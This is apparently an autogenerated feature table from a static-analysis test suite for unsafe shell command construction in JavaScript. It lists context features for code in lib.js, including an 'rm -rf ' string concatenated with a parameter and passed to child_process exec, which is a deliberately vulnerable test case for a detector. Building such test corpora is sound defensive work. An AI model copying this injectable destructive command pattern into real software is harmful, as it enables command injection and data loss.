autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:11:43:19 | "rm -rf " | stringConcatenatedWith | -endpoint- notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:11:43:32 | "rm -rf ... ASource | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:11:43:32 | "rm -rf ... ASource | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:11:43:32 | "rm -rf ... ASource | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:11:43:32 | "rm -rf ... ASource | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:11:43:32 | "rm -rf ... ASource | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:11:43:32 | "rm -rf ... ASource | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:11:43:32 | "rm -rf ... ASource | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:11:43:32 | "rm -rf ... ASource | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:11:43:32 | "rm -rf ... ASource | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:23:43:32 | notASource | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:23:43:32 | notASource | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:23:43:32 | notASource | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:23:43:32 | notASource | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:23:43:32 | notASource | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:23:43:32 | notASource | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:1:47:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:1:47:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:1:47:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:1:47:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:1:47:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:1:47:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:1:47:19 | module.exports.cla3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:1:47:19 | module.exports.cla3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:1:47:19 | module.exports.cla3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:1:47:26 | module. ... = Cla3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:1:47:26 | module. ... = Cla3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:1:47:26 | module. ... = Cla3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:8:47:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:8:47:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:8:47:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:16:47:19 | cla3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:16:47:19 | cla3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:16:47:19 | cla3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:23:47:26 | Cla3 | assignedToPropName | cla3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:23:47:26 | Cla3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:23:47:26 | Cla3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:47:23:47:26 | Cla3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:1:49:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:1:49:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:1:49:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:1:49:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:1:49:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:1:49:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:1:49:17 | module.exports.mz | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:1:49:17 | module.exports.mz | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:1:49:17 | module.exports.mz | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:1:51:1 | module. ... T OK.\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:1:51:1 | module. ... T OK.\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:1:51:1 | module. ... T OK.\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:8:49:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:8:49:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:8:49:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:16:49:17 | mz | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:16:49:17 | mz | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:16:49:17 | mz | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:49:20 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:49:20 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:49:20 | require | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:49:20 | require | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:49:20 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:49:20 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:49:20 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:49:20 | this | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:49:20 | this | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:49:21:49:20 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 